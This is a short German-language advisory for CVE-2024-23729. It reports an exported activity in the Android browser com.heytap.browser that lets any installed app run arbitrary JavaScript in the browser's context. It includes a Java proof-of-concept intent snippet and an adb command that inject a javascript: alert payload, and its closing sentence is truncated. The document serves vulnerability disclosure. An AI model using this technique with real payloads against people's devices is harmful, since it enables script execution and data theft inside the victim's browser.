
CVE-2024-23729
Eine Schwachstelle wurde in der Anwendung com.heytap.browser auf der Android-Plattform entdeckt. Die Schwachstelle ermöglicht es einem Angreifer, beliebigen JavsScript-Code im Kontext der Anwendung ohne Berechtigungen auszuführen.
com.heytap.browserDie Aktivität com.android.browser.RealBrowserActivity in der App com.heytap.browser ist exportiert und kann von jeder Drittanbieter-App ohne Berechtigungen aufgerufen werden. Eine bösartige App kann dies ausnutzen, um beliebigen JavaScript-Code im Kontext der com.heytap.browser-Anwendung auszuführen.
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

Eine erfolgreiche Ausnutzung ermöglicht einem Angreifer:
com.heytap.browser-App auszuführen.